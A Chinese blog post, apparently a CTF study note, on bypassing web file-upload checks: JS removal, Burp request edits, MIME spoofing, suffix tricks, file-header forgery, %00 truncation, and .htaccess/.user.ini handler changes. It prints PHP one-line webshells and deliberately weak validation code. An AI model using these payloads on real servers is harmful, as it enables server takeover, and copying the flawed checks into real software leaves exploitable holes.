上传漏洞的绕过

最新推荐文章于 2023-09-22 23:15:19 发布
最新推荐文章于 2023-09-22 23:15:19 发布
阅读量377 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51313108/article/details/119748899
版权

这里写目录标题

绕过的思考

web应用程序往往允许客户端上传文件,但是程序员如果不对上传的文件进行验证和限制就会导致文件上传漏洞。检测上传的文件有俩方面,客户端检测和服务器端检测。

客户端绕过

客户端是通过js代码来实现对文件的检测。那么攻击者就可以控制js代码来绕过或者修改http请求绕过。

控制js代码

一段前端代码

    <form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()">
        <label for="file">Filename:</label>
        <input type="file" name="file" id="file" />
        <br />
        <input type="submit" name="submit" value="Submit" />
    </form>

function checkfilesuffix()
{
    var file=document.getElementsByName('file')[0]['value'];
    if(file==""||file==null)
    {
        alert("请添加上传文件");
        return false;
    }
    else
    {
        var whitelist=new Array(".jpg",".png",".gif");
        var file_suffix=file.substring(file.lastIndexOf("."));
        if(whitelist.indexOf(file_suffix) == -1)
        {
            alert("该文件不允许上传");
            return false;
        }
    }
}

当选择完上传文件之后,会提交From表单。From表单触发onsubmit事件,onsubmit事件会调用checkfile函数。可以直接将From表单里的onsubmit事件删除,即可绕过。

bp修改请求数据包

bp抓到传输的数据包修改filename文件的扩展名,同时修改Content-Length(Content-Length表示实体正文的长度)。
比如:Content-Length长度是200,filename是"xss.jpg";filename修改为"1.php",Content-Length长度就应该变为198,如果不修改那么文件上传就可能会失败。

服务器端绕过

前端验证毕竟简单,所以后端验证显得尤为重要。服务器端验证主要包括以下几种:

MIME检测

MIME类型用来设定某种扩展名文件的打开方式,当具有该扩展名的文件被访问时浏览器会自动使用指定的应用程序打开。如GIF图片MIME类型为image/gif,CSS文件MIME类型为text/css。在HTTP中对应的是Content-Type。
上传PHP文件时,HTTP请求里的Content-type字段对应的就是MIME类型,修改Content-type字段即可绕过MIME类型的检测。通常情况下只要上传文件MIME都要修改的。有时候用image/jpg有时用image/jpeg
MIME验证代码

<?php
header("Content-type: text/html;charset=utf-8");
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", dirname(__FILE__) . "/upload/");
define("UPLOAD_URL_PATH", str_replace($_SERVER['DOCUMENT_ROOT'], "", UPLOAD_PATH));
if (!file_exists(UPLOAD_PATH)) {
    mkdir(UPLOAD_PATH, 0755);
}
if (!empty($_POST['submit'])) {
    if (!in_array($_FILES['file']['type'], ["image/jpeg", "image/png", "image/gif", "image/jpg"])) {
        echo "<script>alert('文件类型不正确')</script>";
    } else {
        $name = basename($_FILES['file']['name']);
        if (move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_PATH . $name)) {
            echo "<script>alert('上传成功')</script>";
            echo "上传文件相对路径<br>" . UPLOAD_URL_PATH . $name;
        } else {
            echo "<script>alert('上传失败')</script>";
        }
    }
}
?>

phtml绕过

上传php后缀名的文件,可以实现对后端的控制。有时候后端会查看是否后缀有php字样,这个时候可以用phtml后缀名绕过。.php与.phtml文件基本没有太大的区别。

双写后缀

先看一段php代码,这段代码很明显是查看$namel里面存不存在黑名单里的内容,如果存在就把它替换为“”。绕过策略很简单构造pphphp的后缀文件即可。

$name = basename($_FILES['file']['name']);
$blacklist = array("php", "php5", "php4", "php3", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess", "ini");
$name = str_ireplace($blacklist, "", $name);

文件头检查

所谓的文件头检查是当上传文件后,服务器端的PHP代码对文件的文件头进行名单验证,符合上传规则就上传成功,反之上传失败。
文件头的相关知识百度文件头介绍及常见的文件头。值得一提的是txt文件是没有文件头的,相同的内容的php文件与txt文件用winhex打开后内容是一样的。
绕过的策略:将jpg,png等符合上传规则的文件文件头截取,复制到php文件最前部分即可实现绕过。

  • GIF的文件头GIF98a

<?被过滤

<?被过滤怎么办?一句话木马的形式

  • <?php @eval($_GET['cmd']); ?>
  • <? @eval($_GET['cmd']); ?>
  • <script language='php'> @eval($_GET['cmd']); </script>

00截断

php环境00截断的条件

  • php版本小于5.3.29
  • magic_quotes_gpc = Off

在读取字符串时遇到%00可以截断字符串。ctf不同的00截断题目有不同的解法。ctfhub 00截断这道题的WP
PHP pathinfo函数

    <form action=?road=/var/www/html/upload/ method="post" enctype="multipart/form-data">
        <label for="file">Filename:</label>
        <input type="file" name="file" id="file" />
        <br />
        <input type="submit" name="submit" value="Submit" />
    </form>

if (!empty($_POST['submit'])) {
    $name = basename($_FILES['file']['name']); //basename() 函数返回路径中的文件名部分
    $info = pathinfo($name);
    $ext = $info['extension'];   // 文件后缀名
    $whitelist = array("jpg", "png", "gif");
    if (in_array($ext, $whitelist)) {
        $des = $_GET['road'] . "/" . rand(10, 99) . date("YmdHis") . "." . $ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $des))
    // move_uploaded_file函数是00截取的关键,遇到%00之后将忽略%00之后的字符串,存储路径变为%00之前的路径。
        {
            echo "<script>alert('上传成功')</script>";
        } else {
            echo "<script>alert('上传失败')</script>";
        }
    } else {
        echo "文件类型不匹配";
    }
}

.htaccess绕过

.htaccess文件可以配置很多事情,如是否开启站点的图片缓存、自定义错误页面、自定义默认文档、设置WWW域名重定向、设置网页重定向、设置图片防盗链和访问权限控制。.htaccess详解
上传一个.htaccess文件修改配置信息,然后在上传一个命令执行文件就可以造成上传漏洞。大佬的文件漏洞博客
但是这也不是万能的如果不允许上床.htaccess文件或者是nginx 1.10.3等直接不存在解析漏洞这个办法自然也行不通。

<FilesMatch "is">
setHandler application/x-httpd-php
</FilesMatch>

后缀为is的文件解析为PHP文件

AddType application/x-httpd-php jpg

后缀为jpg结尾的文件当作PHP文件

.user.ini后门绕过

  • .user.ini 类似.htaccess文件
    它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法
    .user.ini实际上就是一个可以由用户“自定义”的php.ini 
    我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载
  • .user.ini 利用条件如下:
    服务器脚本语言为PHP
    服务器使用CGI/FastCGI模式
    上传目录下要有可执行的php文件
  • auto_prepend_file,auto_append_file
    类似于在文件前调用了require()函数
    是一个php配置项
    该配置项会让php文件在执行前先包含一个指定的文件,通过这个配置项,我们就可以来隐藏自己的后门
    • auto_prepend_file 表示在php程序加载第一个php代码前加载的php文件,
    • auto_append_file 是在php代码执行完毕后加载的文件

.user.ini

auto_prepend_file = 1.jpg 
//在.user.ini的目录下有可执行的php文件,php文件执行前包含1.jpg文件
山中雨客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022年文件上传漏洞绕过姿势整理,过waf版
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
PHP CTF常见考题的绕过技巧
热门推荐
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
PHP特性&缺陷对比函数&CTF考点
m0_63917373的博客
09-13 2013
PHP特性&缺陷对比函数&CTF考点 ctf Show-web
文件包含漏洞之——str_replace函数绕过与——包含截断绕过
温柔小薛的博客
04-08 6127
str_replace函数绕过 实验环境DVWA,安全性medium 有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双写绕过替换规则轻松绕过 绕过方法 例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103...
无回显getshell
Sentiment的博客
11-28 3219
自从打完Geek challenge后发现现在的很多题都趋于一种无回显getshell的形式,像反序列化、SSTI、RCE、代码审计等题目都会出现,记录几道复现出的无回显getshell where_is_my_FUMO(反弹shell) <?php function chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_
[2021极客大挑战]部分wp
Huamang的博客
11-30 3767
Where_is_my_FUMO 开局是给了一个反弹shell的命令执行 <?php function chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_list, "", $str); } if (isset($_GET['DATA'])) { $data = $_GET['DATA']; $add
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
AWD攻防漏洞分析——文件上传
01-20
这个漏洞在DVBBS6.0时代被hacker们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级高,入侵中上传漏洞也是常见的漏洞。 导致改漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以...
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
上传攻击漏洞总结
06-12
文件介绍了主流的文件上传漏洞,以及如何绕过文件检测来达到上传的目的。
php str_replace的替换漏洞
10-30
php 的函数str_replace替换漏洞
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 3875
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
网络攻击与防御之文件上传漏洞
代登辉的博客
04-12 364
一、文件上传漏洞 1.1 概述 ​ 文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 1.2 ...
CTF实战练习:文件上传漏洞+文件包含漏洞
烟雨天青色
08-06 1万+
BugkuCTF:文件包含2 CTF实战练习:http://120.78.xx.xxx:8013 这道题目看起来又像是跟前一道题是差不多的样子,继续先查看index.php里面的内容: 哎~这次好像显示的并不是base64编码的内容,但是感觉起来这个信息一点用都没有,第二步,查看网页源代码: 从网页源代码里我们可以看出在JS脚本里包含了一个html页面,我们现在来访问一下这个页...
包含漏洞的str_replace函数绕过
最新发布
arissa666的博客
09-22 310
函数绕过(双写就可以绕过)DWVA中等级别的时候会有防御过滤,过滤之后之前的本地远程包含就会发生执行错误。
XSS(跨站脚本攻击)漏洞理解
向上的"狼"的博客
07-16 2306
XSS(跨站脚本攻击)漏洞理解
攻防世界2分题(Web_php_include)
qq_45791542的博客
08-01 275
看题 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 绕过str_replace函数,经查资料知道str_replace这个函数及其不安全 关于绕过函数str_replace的方法 1.大小写绕过 2. 双写绕过 这里用大小写绕过 抓包..
攻防世界 Web_php_include 解题思路
xj28555的博客
07-07 4156
进入题目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这题有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
文件上传漏洞绕过方法
08-12
- *2* [文件上传漏洞常用绕过方式](https://blog.csdn.net/qq_62078839/article/details/124026691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值